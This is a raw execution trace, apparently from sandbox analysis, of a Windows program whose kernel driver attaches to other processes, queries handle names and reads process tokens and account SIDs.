[0148.946] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.946] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034c35f0, HandleInformation=0x0) returned 0x0 [0148.946] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.946] PsReleaseProcessExitSynchronization () returned 0x2 [0148.946] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.946] ObQueryNameString (in: Object=0xfffffa80034c35f0, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.946] ObfDereferenceObject (Object=0xfffffa80034c35f0) returned 0x1 [0148.946] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.946] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.946] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0148.947] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.947] PsAcquireProcessExitSynchronization () returned 0x0 [0148.947] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.947] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034c3980, HandleInformation=0x0) returned 0x0 [0148.947] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.947] PsReleaseProcessExitSynchronization () returned 0x2 [0148.947] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.947] ObQueryNameString (in: Object=0xfffffa80034c3980, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.947] ObfDereferenceObject (Object=0xfffffa80034c3980) returned 0x11 [0148.947] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.947] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x588) returned 0xc8 [0148.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0148.947] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80036a4060, HandleInformation=0x0) returned 0x0 [0148.947] ObOpenObjectByPointer (in: Object=0xfffffa80036a4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0148.947] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0148.947] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80039a7780 | out: TokenHandle=0xfffffa80039a7780*=0xc4) returned 0x0 [0148.948] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0148.948] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.948] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0148.948] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0148.950] CloseHandle (hObject=0xc4) returned 1 [0148.950] CloseHandle (hObject=0xc8) returned 1 [0148.950] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.950] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0148.950] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.950] PsAcquireProcessExitSynchronization () returned 0x0 [0148.950] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0) [0148.950] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037e9070, HandleInformation=0x0) returned 0x0 [0148.950] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.950] PsReleaseProcessExitSynchronization () returned 0x2 [0148.950] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x33 [0148.950] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffa044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffa044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.951] ObfDereferenceObject (Object=0xfffffa80037e9070) returned 0x1 [0148.951] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.951] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.951] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.951] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.951] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.951] PsAcquireProcessExitSynchronization () returned 0x0 [0148.951] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0) [0148.951] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003825130, HandleInformation=0x0) returned 0x0 [0148.951] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.951] PsReleaseProcessExitSynchronization () returned 0x2 [0148.951] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x33 [0148.951] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fde044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fde044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.951] ObfDereferenceObject (Object=0xfffffa8003825130) returned 0x1 [0148.952] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.952] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.952] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.952] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0148.952] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.952] PsAcquireProcessExitSynchronization () returned 0x0 [0148.952] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0) [0148.952] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0148.952] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.952] PsReleaseProcessExitSynchronization () returned 0x2 [0148.952] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x33 [0148.952] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fdf044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdf044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.952] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0148.952] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.952] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.953] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.953] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.953] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.953] PsAcquireProcessExitSynchronization () returned 0x0 [0148.953] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880051635d0) [0148.953] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0148.953] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.953] PsReleaseProcessExitSynchronization () returned 0x2 [0148.953] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x33 [0148.953] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002fe0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe0044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.953] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0148.953] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.953] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xc8 [0148.954] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0148.954] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001e8a630, HandleInformation=0x0) returned 0x0 [0148.954] ObOpenObjectByPointer (in: Object=0xfffffa8001e8a630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0148.954] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x14 [0148.954] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80039a7780 | out: TokenHandle=0xfffffa80039a7780*=0xc4) returned 0x0 [0148.954] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0148.954] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.954] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0148.954] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.593] CloseHandle (hObject=0xc4) returned 1 [0149.593] CloseHandle (hObject=0xc8) returned 1 [0149.593] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.593] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.593] PsAcquireProcessExitSynchronization () returned 0x0 [0149.593] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0) [0149.593] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eb7830, HandleInformation=0x0) returned 0x0 [0149.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.593] PsReleaseProcessExitSynchronization () returned 0x2 [0149.593] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0149.594] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.594] ObfDereferenceObject (Object=0xfffffa8001eb7830) returned 0x1 [0149.594] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0149.594] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.594] PsAcquireProcessExitSynchronization () returned 0x0 [0149.594] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0) [0149.594] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e9e2b0, HandleInformation=0x0) returned 0x0 [0149.594] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.594] PsReleaseProcessExitSynchronization () returned 0x2 [0149.594] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0149.594] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.594] ObfDereferenceObject (Object=0xfffffa8001e9e2b0) returned 0x1 [0149.595] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.595] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.595] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.595] PsAcquireProcessExitSynchronization () returned 0x0 [0149.595] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880051635d0) [0149.595] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.595] PsReleaseProcessExitSynchronization () returned 0x2 [0149.595] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0149.595] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002f29044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f29044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.595] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xc8 [0149.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.596] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fccb30, HandleInformation=0x0) returned 0x0 [0149.596] ObOpenObjectByPointer (in: Object=0xfffffa8001fccb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.596] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x14 [0149.596] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.596] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.597] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.597] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.599] CloseHandle (hObject=0xc4) returned 1 [0149.599] CloseHandle (hObject=0xc8) returned 1 [0149.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.599] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.599] PsAcquireProcessExitSynchronization () returned 0x0 [0149.600] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0) [0149.600] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fc9c50, HandleInformation=0x0) returned 0x0 [0149.600] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.600] PsReleaseProcessExitSynchronization () returned 0x2 [0149.600] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0149.600] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.600] ObfDereferenceObject (Object=0xfffffa8001fc9c50) returned 0x1 [0149.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0149.600] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.600] PsAcquireProcessExitSynchronization () returned 0x0 [0149.600] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0) [0149.601] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fca500, HandleInformation=0x0) returned 0x0 [0149.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.601] PsReleaseProcessExitSynchronization () returned 0x2 [0149.601] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0149.601] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff1044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.601] ObfDereferenceObject (Object=0xfffffa8001fca500) returned 0x1 [0149.601] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.601] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.601] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.601] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.601] PsAcquireProcessExitSynchronization () returned 0x0 [0149.601] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880051635d0) [0149.601] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.601] PsReleaseProcessExitSynchronization () returned 0x2 [0149.601] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0149.601] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ef0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ef0044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.601] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.601] 